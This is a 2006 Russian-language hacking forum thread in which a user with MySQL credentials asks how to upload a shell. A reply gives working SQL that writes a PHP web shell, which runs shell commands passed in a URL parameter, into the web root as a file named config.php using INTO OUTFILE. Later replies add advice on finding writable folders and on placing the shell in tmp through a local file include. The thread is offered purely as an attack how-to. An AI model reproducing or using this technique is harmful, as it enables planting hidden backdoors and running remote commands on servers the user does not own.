Shell через sql

Ambient_man · 5 Nov 2006

Знающие подскажите , реально ли это сделать.

Есть доступ к mysql , то есть логин и пасс для доступа.

Как залить шелл ? и реально ли это ?

Если можно с примерами ...

spheere · 5 Nov 2006

CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
DROP TABLE `config`;

Тока эта, поменяй название таблицы и имя файла...
Ато можно ненароком подменить настоящие.

Ambient_man · 5 Nov 2006

spheere said:

CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
DROP TABLE `config`;

Тока эта, поменяй название таблицы и имя файла...
Ато можно ненароком подменить настоящие.
Click to expand...

#1 - Can't create/write to file '..\..\..\www\co2nfig.php' (Errcode: 2)

spheere · 5 Nov 2006

Найди папку справами на запись, например Uploads...
И путь подбери, вобщем экспериментируй.

degeneration x · 5 Nov 2006

Или если есть локальный инклюд, лей шелл в tmp.

m0nzt3r · 6 Nov 2006

эта тема не раз обсуждалась.поиск по словам "into , outfile"

Shell через sql

Ambient_man New Member

spheere Member

Ambient_man New Member

spheere Member

degeneration x Elder - Старейшина

m0nzt3r моня

Useful Searches

Shell через sql

Ambient_man New Member

spheere Member

Ambient_man New Member

spheere Member

degeneration x Elder - Старейшина

m0nzt3r моня